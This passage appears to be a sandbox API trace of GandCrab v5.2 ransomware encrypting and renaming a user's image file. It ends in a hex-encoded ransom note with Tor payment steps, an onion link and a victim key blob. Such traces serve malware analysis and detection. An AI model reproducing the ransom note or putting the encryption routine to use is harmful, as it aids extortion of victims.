dwFreeType=0x8000) returned 1 [0093.774] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.774] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\3pvhyejku.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0093.774] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.774] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0093.775] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.775] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.776] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.776] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.776] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.776] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0093.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.777] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.777] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.777] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.778] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.778] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.778] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.778] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0093.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.779] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.779] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.779] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.779] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0093.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.780] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.780] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.780] GetLastError () returned 0x0 [0093.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.780] CryptDestroyKey (hKey=0x503578) returned 1 [0093.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.780] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.781] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.781] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0093.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.782] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.782] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.782] GetLastError () returned 0x0 [0093.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.782] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.783] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.783] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.783] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.783] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xb95b, lpOverlapped=0x0) returned 1 [0093.797] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff46a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.797] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb95b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xb95b, lpOverlapped=0x0) returned 1 [0093.799] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.799] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0093.801] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.804] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.805] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.805] CloseHandle (hObject=0x2ac) returned 1 [0093.805] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\3pvhyejku.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\3PVHyEjKu.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\3pvhyejku.png.titwmvjl"), dwFlags=0x1) returned 1 [0093.806] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.806] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.806] lstrcmpW (lpString1="7vyfk2YzGvFDhoGguhe", lpString2=".") returned 1 [0093.806] lstrcmpW (lpString1="7vyfk2YzGvFDhoGguhe", lpString2="..") returned 1 [0093.806] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="7vyfk2YzGvFDhoGguhe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe" [0093.807] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\" [0093.807] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.808] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.808] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.808] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.808] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\\\TITWMVJL-DECRYPT.txt") returned 72 [0093.808] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0093.810] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x